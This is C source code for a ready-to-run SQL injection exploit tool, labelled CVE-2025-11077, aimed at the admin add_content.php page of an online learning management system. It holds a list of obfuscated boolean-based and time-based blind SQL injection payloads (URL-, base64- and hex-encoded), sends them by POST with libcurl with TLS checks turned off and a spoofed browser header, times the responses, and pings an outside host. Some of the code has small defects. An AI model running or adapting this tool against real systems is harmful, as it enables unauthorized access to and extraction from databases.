#include #include "argparse.h" #include #include #include #include #include #include #include #include #include #define F_U 3000 #define POST_DATA 7000 #define DATA_WRITE 9000 const char* cookies = NULL; const char* baseurl = NULL; const char* fileName = NULL; const char* fullURL = NULL; int verbose = 0; int cookiesFileS = 0; int flagsTBD = 0; int flagFile = 0; struct Mem { char* buffer; size_t len; }; size_t write_cb(void* ptr, size_t size, size_t nmemb, void* userdata) { size_t total = size * nmemb; struct Mem* m = (struct Mem*)userdata; char* tmp = realloc(m->buffer, m->len + total + 1); if (!tmp) return 0; m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } const char* boolean_based_blind[] = { "%61%6E%64%20%28%73%65%6C%65%63%74%20%73%75%62%73%74%72%69%6E%67%28%40%40%76%65%72%73%69%6F%6E%2C%31%2C%31%29%29=%E2%80%99%41%E2%80%99", "%61%6E%64%20%28%73%65%6C%65%63%74%20%32%30%73%75%62%73%74%72%69%6E%67%28%40%%76%65%72%73%69%6F%6E%2C%31%2C%31%29%29=%E2%80%98%41%E2%80%98", "YW5kIChzZWxlY3Qgc3Vic3RyaW5nKEBAdmVyc2lvbiwxLDEpKSA9ICdBJwo=", "YW5kIChzZWxlY3Qgc3Vic3RyaW5nKEBAdmVyc2lvbiwxLDEpKSA9ICdBJw==", "5957356b4943687a5a57786c5933516763335669633352796157356e4b454241646d567963326c76626977784c4445704b534139494364424a776f3d" "%61%6E%64%20%00%28%73%65%6C%65%63%74%20%00%73%75%62%73%74%72%69%6E%67%28%40%40%76%65%72%73%69%6F%6E%2C%31%2C%31%29%29=%20%00%E2%80%98%41%E2%80%98%00", "%61%6E%64%20%00%00%28%73%65%6C%65%63%74%20%00%00%73%75%62%73%74%72%69%6E%67%28%40%40%76%65%72%73%69%6F%6E%2C%31%2C%31%29%29%20=%20%00%00%E2%80%99%41%E2%80%99%00%00", "%41%4E%44%25%32%30%25%32%38%53%45%4C%45%43%54%25%32%30%25%32%41%25%32%30%46%52%4F%4D%25%32%30%25%32%38%53%45%4C%45%43%54%25%32%38%53%4C%45%45%50%25%32%38%35%25%32%39%25%32%39%25%32%39%62%41%4B%4C%25%32%39%25%32%30%41%4E%44%25%32%30%25%32%37%4A%53%4B%25%32%37%25%33%44%25%32%37%4A%53%4B", "%41%4E%44%25%32%30%25%00%32%38%53%45%4C%45%43%54%25%32%30%25%32%41%25%32%30%46%52%4F%4D%25%32%30%25%32%38%53%45%4C%45%43%54%25%32%38%53%00%4C%45%45%50%25%32%38%35%25%32%39%25%32%39%25%32%39%62%41%4B%4C%25%32%39%25%32%30%41%4E%44%25%32%30%00%25%32%37%4A%53%4B%25%32%37%25%33%44%25%32%37%4A%53%4B", "414e44202853454c454354202a2046524f4d202853454c45435428534c454550283529292962414b4c2920414e4420274a534b273d274a534b", "%31%31%92%20AND%20%28SELECT%203600%20FROM%20%28SELECT%28SLEEP%28%35%29%29WjSV%29", "11%27%20AND%20%29SELECT%203600%20FROM%20%29SELECT%29SLEEP%295%28%28%28WjSV%28", "11%27%00%20%00AND%20%00%29%00SELECT%20%003600%20%00FROM%20%00%29%00SELECT%29%00SLEEP%29%005%28%00%28%00%28%00WjSV%28%00", "11%E2%80%98%20%00AND%20%00%29SELECT%203600%20%00FROM%20%00%29SELECT%29SLEEP%29%35%29%29%29WjSV%29%00", "11%E2%80%99%20%00%00AND%20%00%00%28SELECT%203600%20%00%00FROM%20%00%00%28SELECT%28SLEEP%28%35%29%29%29WjSV%29%00%00", "MTEnIEFORCAoU0VMRUNUIDM2MDAgRlJPTSAoU0VMRUNUKFNMRUVQKDUpKSlXalNWKQo=", "MTEnIEFORCAoU0VMRUNUIDM2MDAgRlJPTSAoU0VMRUNUKFNMRUVQKDUpKSlXalNWKQ==", "UkxJS0UgKFNFTEVDVCAoQ0FTRSBXSEVOICg0MzQ2PTQzNDYpIFRIRU4gMHg2MTY0NmQ2OTZlIEVMU0UgMHgyOCBFTkQpKSBBTkQgJ1R4d3MnPScsCg==", "UkxJS0UgKFNFTEVDVCAoQ0FTRSBXSEVOICg0MzQ2PTQzNDYpIFRIRU4gMHg2MTY0NmQ2OTZlIEVMU0UgMHgyOCBFTkQpKSBBTkQgJ1R4d3MnPSc=", "RLIKE%20%28SELECT%20%28CASE%20WHEN%20%284346=4346%29%20THEN%200x61646d696e%20ELSE%200x28%20END%29%29%20AND%20%91Txws%91=%91", "RLIKE%20%28SELECT%20%28CASE%20WHEN%20%284346=4346%29%20THEN%200x61646d696e%20ELSE%200x28%20END%29%29%20AND%20%92Txws%92=%92", "RLIKE%28SELECT%28CASE%20WHEN%284346%20=%204346%29%20THEN%200x61646d696e%20ELSE%200x28%20END%29%29%20AND%20%E2%80%98Txws%E2%80%98%20=%20%E2%80%98", "RLIKE%28SELECT%28CASE%20WHEN%284346%20=%204346%29%20THEN%200x61646d696e%20ELSE%200x28%20END%29%29%20AND%20%E2%80%98Txws%E2%80%99%20=%20%E2%80%99", "524c494b45202853454c454354202843415345205748454e2028343334363d3433343629205448454e2030783631363436643639366520454c5345203078323820454e44292920414e44202754787773273d27", "RLIKE%28SELECT%28CASE%20%00WHEN%284346%20=%20%004346%29%20%00THEN%20%000x61646d696e%20ELSE%200x28%20END%29%29%20AND%20%00%E2%80%98Txws%E2%80%98%20=%20%00%E2%80%99%00", "RLIKE(SELECT(CASE%20%00%00WHEN(4346%20=%20%004346)%20%00%00THEN%20%00%000x61646d696e%20ELSE%200x28%20END))%20AND%20%00%00%E2%80%99Txws%E2%80%99%20=%20%00%00%E2%80%99%00%00", NULL }; const char* words[] = { " AND ", " OR ", " NOT ", " = ", "<>", " > ", " < ", " >= ", " <= ", "SELECT", "FROM", "WHERE", "CASE", "WHEN", "THEN", "ELSE", "GROUP BY", "HAVING", "ORDER BY", "RLIKE", "REGEXP", "LIKE", "SUBSTRING", "SUBSTR", "ASCII", "ORD", "CHAR", "CAST", "CONVERT", "LENGTH", "LEN", "IF(", "IFNULL(", "COALESCE(", "CASE WHEN", "CASE", "UNION", "INFORMATION_SCHEMA", "INFORMATION_SCHEMA.TABLES", "INFORMATION_SCHEMA.COLUMNS", "DATABASE(", "VERSION(", "--", "#", "/*", "*/", ";", "'", "\"", "`", "CASE WHEN (", "SELECT (CASE WHEN", " RLIKE (SELECT", " AND (SELECT", NULL }; void exitSyscall() { __asm__ volatile ( "mov $0x3C, %%rax\n\t" "xor %%rdi, %%rdi\n\t" "syscall\n\t" : : : "rax", "rdi" ); } static long timespecDiff(const struct timespec* a, const struct timespec* b) { long s = b->tv_sec - a->tv_sec; long ns = b->tv_nsec - a->tv_nsec; return s * 1000 + ns / 1000000; } static void cPing(int nV) { if (nV == 0) { __asm__ volatile("nop"); } else { pid_t pid; __asm__ volatile ( "mov $0x3A, %%rax\n\t" "syscall\n\t" : "=a" (pid) : : "r11", "rcx", "memory" ); if (pid == -1) { fprintf(stderr, "[-] Error call sys_vfork, Exit...\n"); } if (pid == 0) { const char* fullpath = "/usr/bin/ping"; const char* argv[] = { "ping", "-c", "7", "bytrep.com", NULL }; const char env[] = { 0 }; printf("[+] chiled PID : %d\n", pid); const char* ms1 = "[-] Error call sys_execve, Exit...\n"; size_t l1 = strlen(ms1); printf("[+] Running the ping command to check your internet connection...\n"); printf("[+] Command : ping -c 7 bytrep.com\n"); __asm__ volatile ( "mov $0x3B, %%rax\n\t" "mov %[fileName], %%rdi\n\t" "mov %[argv], %%rsi\n\t" "mov %[env], %%rdx\n\t" "syscall\n\t" "test %%rax, %%rax\n\t" "js negV\n\t" "posV:\n\t" "nop\n\t" "jmp resultSys\n\t" "negV:\n\t" "mov %[m1], %%rsi\n\t" "mov %[l1], %%rdx\n\t" "mov $0x1, %%rax\n\t" "mov $0x1, %%rdi\n\t" "syscall\n\t" "mov $0x0, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "syscall\n\t" "resultSys:\n\t" : : [fileName] "r" (fullpath), [argv] "r" (argv), [env] "r" (env), [m1] "r" (ms1), [l1] "r" (l1) : "rax", "rdi", "rsi", "rdx", "rcx", "r11", "memory" ); } else if (pid < 0) { pid_t mainPid; __asm__ volatile ( "syscall\n\t" :"=a"(mainPid) :"a"(0x27) :"rcx", "r11", "memory" ); if (mainPid == 0) { printf("[-] Error Get MAIN PID !\n"); exitSyscall(); } printf("[+] MAIN PID : %d\n", (int)mainPid); } else { printf("[+] Finish ping command.\n"); } } } static uint64_t logfile(const char *fileName, const char *payload, const char *mes, long httpCode, const char *responseBuffer, long lenResponse) { printf("===================================================== [LOG FILE] ====================================================="); const char* m2 = "[-] Error Create file (NULL value)\n"; size_t l2 = strlen(m2); const char* mS3 = "[+] Create File success\n"; size_t lE3 = strlen(mS3); FILE* file = fopen(fileName, "w"); uintptr_t fptr = (uintptr_t)file; if (!file) { perror("fopen failed"); return 1; } __asm__ volatile ( "cmp $0x0, %[file]\n\t" "je zeroFlag\n\t" "notZeroFlag:\n\t" "mov %[m3], %%rsi\n\t" "mov $0x1, %%rdi\n\t" "mov %[l3], %%rdx\n\t" "mov $0x1, %%rax\n\t" "syscall\n\t" "jmp runSyscall\n\t" "zeroFlag:\n\t" "mov %[m2], %%rsi\n\t" "mov $0x1, %%rdi\n\t" "mov %[l2], %%rdx\n\t" "mov $0x1, %%rax\n\t" "syscall\n\t" "mov $0x0, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "syscall\n\t" "runSyscall:\n\t" : : [file] "r" (fptr), [m2] "r" ((uintptr_t)m2), [l2] "r" (l2), [m3] "r" ((uintptr_t)mS3), [l3] "r" (lE3) : "rax", "rdi", "rsi", "rdx", "r11", "rcx", "memory" ); printf("[+] FILE NAME : %s\n", fileName); printf("[+] Write FILE ...\n"); struct timespec rq,rm; rq.tv_sec = 1; rq.tv_nsec = 600000000; register long r10R asm("r10"); r10R = 0; printf("\e[0;33m[+] Sleep (%ld seconds) && (%ld nanoseconds)...\e[0m\n", rq.tv_sec, rq.tv_nsec); int ret; __asm__ volatile ( "syscall" : "=a"(ret) : "a"(0xE6), "D"((long)0), "S"((long)0), "d"(&rq), "r"(r10R) : "rcx", "r11", "memory" ); char dataW[DATA_WRITE]; int lenWrite = snprintf(dataW, DATA_WRITE, "[+] PAYLOAD : %s\n[+] %s\n[+] HTTP CODE : %ld\n[+] RESPONSE BUFFER : \n%s\n[+] LEN : %zu\n--------------------------------------------\n", payload, mes, httpCode, responseBuffer, lenResponse); size_t writeV = fwrite(dataW, 1, lenWrite, file); if (writeV < lenWrite) { fprintf(stderr, "[-] Error write data to file!\n"); exitSyscall(); } else { printf("[+] Write file Success .\n"); } if (fclose(file) != 0) { perror("[-] Error closing file"); return 1; } else { printf("[+] Close file.\n"); } return 0; printf("======================================================================================================================\n"); } int checkLen(int len, char* buf, size_t bufcap) { if (len < 0 || (size_t)len >= bufcap) { printf("\e[0;31m[-] Len is Long ! \e[0m\n"); printf("\e[0;31m[-] Len %d\e[0m\n", len); return 1; } else { printf("\e[0;34m[+] Len Is Not Long.\e[0m\n"); return 0; } return 0; } int nextNumber() { static const int numbers[] = { 1212, 3434, 4545, 5677, 7677, 3243 }; static int index = 0; const int cNumber = sizeof(numbers) / sizeof(numbers[0]); int valNum = numbers[index]; index = (index + 1) % cNumber; return valNum; } static void requestBlind(const char *baseURL) { int nullValue = 0; CURL* curl = curl_easy_init(); const char* mes3 = "\e[0;34m[+] Create Object CURL Success.\n"; const char* mes4 = "\e[0;31m[-] Error Create Object CURL !\e[0m\n"; size_t len3 = strlen(mes3); size_t len4 = strlen(mes4); __asm__ volatile ( "cmp $0x0, %[curlO]\n\t" "je .donV\n\t" ".erD:\n\t" "mov $0x1, %%rax\n\t" "mov $0x1, %%rdi\n\t" "mov %[msg], %%rsi\n\t" "mov %[len], %%rdx\n\t" "syscall\n\t" "jmp .finishC\n\t" ".donV:\n\t" "mov $0x1, %%rax\n\t" "mov $0x1, %%rdi\n\t" "mov %[msg1], %%rsi\n\t" "mov %[len1], %%rdx\n\t" "syscall\n\t" "mov $0x1, %[nullV1]\n\t" ".finishC:\n\t" : [nullV1] "+r" (nullValue) : [curlO] "r" (curl), [msg] "r" ((const char*)mes3), [len] "r" ((long)len3), [msg1] "r" ((const char*)mes4), [len1] "r" ((long)len4) : "rax", "rdi", "rsi", "rdx", "rcx", "r11", "memory" ); cPing(nullValue); struct Mem response; CURLcode res; response.buffer = NULL; response.len = 0; const char* mes5 = "\e[0;34m[+] Buffer Clean Success.\e[0m\n"; size_t len5 = strlen(mes5); __asm__ volatile ( "test %[buffer], %[buffer]\n\t" "jz L_print_clean\n\t" "L_continue:\n\t" "jmp L_done\n\t" "L_print_clean:\n\t" "mov $0x1, %%rax\n\t" "mov $0x1, %%rdi\n\t" "movq %[msg13], %%rsi\n\t" "mov %[len13], %%rdx\n\t" "syscall\n\t" "L_done:\n\t" : : [buffer] "r" ((const char*)response.buffer), [msg13] "r" (mes5), [len13] "r" (len5) : "rax", "rdi", "rsi", "rdx", "rcx", "r11", "memory" ); char full[F_U]; printf("[+] CHECK INPUT IP ...\n"); int v1 = 0; int v2 = 0; if (strcmp(baseURL, "http://localhost") == 0) { printf("[+] localhost detect in BASE URL ."); __asm__ volatile ( "add $0x1, %[v1]\n\t" : [v1] "+r" (v1) : : ); goto checkV; } else { printf("[-] Not detect localhost in BASE URL !\n"); printf("[+] CHECK LOCAL IP : 127.0.0.1...\n"); if (strstr(baseURL, "172.0.0.1") != NULL) { printf("[+] FOUND local ip .\n"); __asm__ volatile ( "add $0x1, %[v2]\n\t" : [v2] "+r" (v2) : : ); goto checkV; } else { printf("[-] Not foud Local IP, check target ip...\n"); char* lastW = strstr(baseURL, "http://"); if (lastW != NULL) { char ipF[20] = { 0 }; lastW += strlen("http://"); strncpy(ipF, lastW, 19); ipF[19] = '\0'; printf("[+] Input ip : %s\n", ipF); regex_t regex; const char* regixP = "^((25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])\\.){3}" "(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])$"; if (regcomp(®ex, regixP, REG_EXTENDED) != 0) { printf("[-] The format has not been converted into an executable one.\n"); exitSyscall(); } else { printf("[+] The format has been successfully converted to an executable format.\n"); } if (regexec(®ex, ipF, 0, NULL, 0) == 0) { struct in_addr addr; printf("[+] Valid Format IP.\n"); printf("[+] CHECK Version IP...\n"); if (inet_pton(AF_INET, ipF, &addr) == 0) { printf("[+] Result Version ip : IPV4.\n"); printf("[+] Start Exploit...\n"); } } else { printf("[-] Invalid Format IP !\n"); exitSyscall(); } } else { printf("[-] Error get target IP !\n"); exitSyscall(); } } } checkV : if (v1 != 0 || v2 != 0) { printf("[+] Check ip Success, Start Exploit...\n"); } for (int j = 0; boolean_based_blind[j] != NULL; j++) { printf("-----------------------------------------------------------------------------------\n"); int lenC = snprintf(full, F_U, "%s/lms/admin/add_content.php", baseURL); if (checkLen(lenC, full, F_U) == 1) { fprintf(stderr, "\e[0;31m[-] Error write base url !\e[0m\n"); exitSyscall(); } printf("\e[0;34m[+] Write base URL success.\e[0m\n"); char postData[POST_DATA]; int PNumber = nextNumber(); int lenPost = snprintf(postData, POST_DATA, "title=%s&content=

%d

&save=Save", boolean_based_blind[j], PNumber ); if (checkLen(lenPost, postData, POST_DATA) == 1) { fprintf(stderr, "\e[0;31m[-] Error write DATA Succes!\e[0m\n"); exitSyscall(); } printf("\e[0;34m[+] Write POST DATA Success.\e[0m\n"); printf("[+] POST DATA : --------------------------------------------------\n"); printf("\n%s\n", postData); printf("[+] SIZE : %d\n", POST_DATA); printf("[+] Len : %zu\n", strlen(postData)); printf("------------------------------------------------------------------\n"); printf("[+] BASE URL : %s\n", baseURL); printf("[+] FULL URL : %s\n", full); curl_easy_setopt(curl, CURLOPT_URL, full); curl_easy_setopt(curl, CURLOPT_ACCEPT_ENCODING, ""); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); if (cookiesFileS) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_POST, 1L); curl_easy_setopt(curl, CURLOPT_POSTFIELDS, postData); curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, (long)strlen(postData)); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); struct timespec rqtp, rmtp; rqtp.tv_sec = 1; rqtp.tv_nsec = 500000000; register long r10R asm("r10"); r10R = 0; printf("\e[0;33m[+] Sleep (%ld seconds) && (%ld nanoseconds)...\e[0m\n", rqtp.tv_sec, rqtp.tv_nsec); int ret; __asm__ volatile ( "syscall" : "=a"(ret) : "a"(0xE6), "D"((long)0), "S"((long)0), "d"(&rqtp), "r"(r10R) : "rcx", "r11", "memory" ); struct timespec t0, t1; curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); struct curl_slist* h = NULL; h = curl_slist_append(h, "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:50.0)"); h = curl_slist_append(h, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br"); h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5"); h = curl_slist_append(h, "Connection: keep-alive"); h = curl_slist_append(h, "Upgrade-Insecure-Requests: 1"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h); if (verbose) { printf("========================================== [Verbose MODE] ==========================================\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } if (flagsTBD != 0) { long ret; printf("[+] Arg TBD run, CHECK time-based blind...\n"); __asm__ volatile ( "syscall\n\t" : "=a" (ret) : "a" (0xE4), "D" (0x1), "S" (&t0) : "rcx", "r11", "memory" ); if (ret < 0) { fprintf(stderr, "[-] clock_gettime syscall failed !"); } printf("[+] secs=%lld nsec=%ld\n", (long long)t1.tv_sec, (long)t1.tv_nsec); } res = curl_easy_perform(curl); curl_slist_free_all(h); if (res == CURLE_OK) { printf("\e[1;36m[+] Request sent successfully\e[0m\n"); long httpcode; double timeT; double timeR; char* urlD = NULL; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpcode); curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &timeT); curl_easy_getinfo(curl, CURLINFO_REDIRECT_TIME, &timeR); curl_easy_getinfo(curl, CURLINFO_REDIRECT_URL, &urlD); printf("\e[0;32m[+] Delayed response : %f\e[0m\n", timeT); printf("\e[0;34m[+] TIME REDIRECT: %.1f\e[0m\n", timeR); long connID; if (urlD == NULL) { printf("\e[0;36m[+] Not REDIRECT Found.\e[0m\n"); } else { printf("\e[0;34m[+] REDIRECT To : %s\e[0m\n", urlD); } printf("\e[0;32m[+] HTTP CODE : %ld\n", httpcode); curl_easy_getinfo(curl, CURLINFO_CONN_ID, &connID); printf("[+] Connection ID used: %ld\n", connID); long availAuth; curl_easy_getinfo(curl, CURLINFO_HTTPAUTH_AVAIL, &availAuth); printf("[+] CHECK support Authentication...\n"); printf("[+] Available HTTP auth methods: 0x%lx\n", availAuth); if (availAuth & CURLAUTH_BASIC) { printf("[+] Basic Authentication.\n"); } if (availAuth & CURLAUTH_DIGEST) { printf("[+] Digest Authentication.\n"); } if (availAuth & CURLAUTH_NTLM) { printf("[+] NTLM Authentication.\n"); } if (availAuth & CURLAUTH_NEGOTIATE) { printf("[+] SPNEGO / Kerberos Authentication.\n"); } if (availAuth == 0) { printf("[-] No HTTP auth methods detected.\n"); } long httpVersion; curl_easy_getinfo(curl, CURLINFO_HTTP_VERSION, &httpVersion); printf("[+] HTTP version used : "); switch (httpVersion) { case CURL_HTTP_VERSION_1_0: printf("1.0\n"); break; case CURL_HTTP_VERSION_1_1: printf("1.1\n"); break; case CURL_HTTP_VERSION_2_0: printf("2.0\n"); break; case CURL_HTTP_VERSION_2TLS: printf("2 (over TLS)\n"); break; case CURL_HTTP_VERSION_3: printf("3\n"); break; default: printf("Unknown\n"); break; } if (flagsTBD != 0) { long ret1; __asm__ volatile ( "syscall\n\t" : "=a" (ret1) : "a" (0xE4), "D" (0x1), "S" (&t1) : "rcx", "r11", "memory" ); if (ret1 < 0) { fprintf(stderr, "[-] clock_gettime syscall failed !"); } printf("[+] secs=%lld nsec=%ld\n", (long long)t0.tv_sec, (long)t0.tv_nsec); } if (flagsTBD != 0) { long ms = timespecDiff(&t0, &t1); printf("[+] payload elapsed (ms): %ld\n", ms); if (ms > 4000) { printf("[+] Detected time delay (likely SLEEP)\n"); } else { printf("[+] No significant delay detected.\n"); } } if (response.buffer != NULL) { printf("\e[0;35m=============================================== [RESPONSE] ===============================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[0;32m[+] Size Pointer response : %d\e[0m\n", sizeof(response.buffer)); printf("\e[0;32m[+] Len : %zu\e[0m\n", response.len); printf("\e[0;35m==========================================================================================================\e[0m\n"); } else { printf("\e[0;31m[-] Error show buffer : NULL response !\n"); __asm__ volatile ( "xor %%rdi, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "syscall\n\t" : : : "rax", "rdi" ); } if (httpcode == 501) { printf("[-] Response Code 501, Please check your input url !\n"); if (response.buffer != NULL) { if (strstr(response.buffer, "Unsupported method ('POST')") != NULL) { printf("[-] Error : Unsupported method ('POST')\n"); } else { printf("[-] Not detect error.\n"); } } } if (flagFile != 0) { logfile(fileName, boolean_based_blind[j], "Result Request :", httpcode, response.buffer, response.len); } if (httpcode >= 200 && httpcode < 300) { printf("\e[0;32m[+] Http Code (200 < 300) : %ld\e[0m\n", httpcode); if (response.buffer != NULL) { printf("=============================================== [Response] ===============================================\e[0m\n"); printf("%s\n", response.buffer); printf("[+] Len response : %zu\n", response.len); printf("==========================================================================================================\n"); } else { printf("[-] Response is NULL !\n"); exitSyscall(); } int NotfoundWord = 1; printf("\e[0;33m[+] Check Word in response (word boolean-based blind)...\n"); for (int y = 0; words[y] != NULL; y++) { if (response.buffer != NULL) { if (strstr(response.buffer, words[y]) != NULL) { printf("[+] Word Detect in response : %s\n", words[y]); printf("=============================================== [Response FOUND WORD] ===============================================\e[0m\n"); printf("%s\n", response.buffer); printf("[+] Len response : %zu\n", response.len); printf("======================================================================================================================\n"); NotfoundWord = 0; break; } } } if (NotfoundWord != 0) { printf("[-] Not found word in response !\n"); printf("[-] Please check Target ip and file (add_content.php)\n"); } } else { fprintf(stderr,"\e[0;31m[-] Http code Not range (%ld)\e[0m\n", httpcode); } } else { fprintf(stderr,"\e[0;31m[-] The request was not sent !\e[0m\n"); fprintf(stderr,"\e[0;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res)); exitSyscall(); } } curl_easy_cleanup(curl); if (response.buffer) { free(response.buffer); response.buffer = NULL; response.len = 0; } } int main(int argc, const char** argv) { printf("\e[0;37m+-------------------------------------------------------------+\e[0m\n"); printf("\e[0;37m| Author : Byte Reaper |\e[0m\n"); printf("\e[0;37m| CVE : CVE-2025-11077 |\e[0m\n"); printf("\e[0;37m| Date : 2025-09-28 |\e[0m\n"); printf("\e[0;37m| Target File : /admin/add_content.php |\e[0m\n"); printf("\e[0;37m| Version : V1.0 |\e[0m\n"); printf("\e[0;37m+-------------------------------------------------------------+\e[0m\n"); printf("\e[1;31m---------------------------------------------------------------------------------------------------------------------------------------\e[0m\n"); printf("[+] System detect...\e[0m\n"); struct utsname os; int tbd = 0; __asm__ volatile ( "mov %0, %%rdi\n\t" "mov $0x3F, %%rax\n\t" "syscall\n\t" : : "r"(&os) : "rax", "rdi", "r11", "rcx", "memory" ); printf("\e[0;36m[+] System Name: %s\e[0m\n", os.sysname); printf("\e[0;36m[+] Machine : %s\e[0m\n", os.machine); if (strstr(os.sysname, "Linux") != NULL) { printf("\e[0;36m[+] Linux OS, Check Machine architecture...\e[0m\n"); } else { printf("[-] OS Not Linux 64 bit (%s),Exit...\e[0m\n", os.sysname); exitSyscall(); } if (strstr(os.machine, "x86_64") != NULL) { printf("\e[0;36m[+] Machine architecture is 64 bit, run exploit...\e[0m\n"); } else { printf("[-] OS Not architecture 64 bit (%s), Exit...\e[0m\n", os.machine); exitSyscall(); } struct argparse_option options[] = { OPT_HELP(), OPT_STRING('u', "url", &baseurl, "Enter Target Url (BASE URL Online Learning Management System Project)"), OPT_STRING('c', "cookies", &cookies, "Enter File cookies (Unnecessary) (DEFAULT = NULL)"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode (request info) (DEFAULT = 0)"), OPT_BOOLEAN('b', "tbd", &tbd, "Check time-based blind (DEFAULT = 0)"), OPT_STRING('f', "file", &fileName, "Log file (DEFAULT = NULL)"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (!baseurl) { printf("\e[0;31m[-] Please Enter target Url !\e[0m\n"); printf("\e[0;31m[-] Example : ./CVE-2025-11077 -u http://\e[0m\n"); exitSyscall(); } if (cookies) { __asm__ volatile ( "mov $0x1, %[var1]\n\t" "test %[var1], %[var1]\n\t" "je .notP\n\t" "jmp .finish1\n\t" ".notP:\n\t" "mov $0xE7, %%rax\n\t" "mov $0x0, %%rdi\n\t" "syscall\n\t" ".finish1:\n\t" : [var1] "+r" (cookiesFileS) : : "rax", "rdi" ); } if (verbose) { __asm__ volatile ( "mov $0x1, %[var2]\n\t" "test %[var2], %[var2]\n\t" "je .notP1\n\t" "jmp .exitGF\n\t" ".notP1:\n\t" "mov $0xE7, %%rax\n\t" "mov $0x0, %%rdi\n\t" "syscall\n\t" ".exitGF:\n\t" : [var2] "+r" (verbose) : : "rax", "rdi" ); } if (tbd != 0) { flagsTBD = 1; } else { __asm__ volatile("nop"); } if (fileName != NULL) { __asm__ volatile ( "mov $0x1, %[var4]\n\t" "test %[var4], %[var4]\n\t" "je .notPP5\n\t" "jmp .finish4\n\t" ".notPP5:\n\t" "mov $0xE7, %%rax\n\t" "mov $0x0, %%rdi\n\t" "syscall\n\t" ".finish4:\n\t" : [var4] "+r" (flagFile) : : "rax", "rdi", "r11", "rcx", "memory" ); } else { __asm__ volatile ( "mov $0x0, %[var7]\n\t" : : [var7] "r" (flagFile) : ); } requestBlind(baseurl); __asm__ volatile ( "mov $0x0, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "syscall\n\t" : : : "rax", "rdi" ); }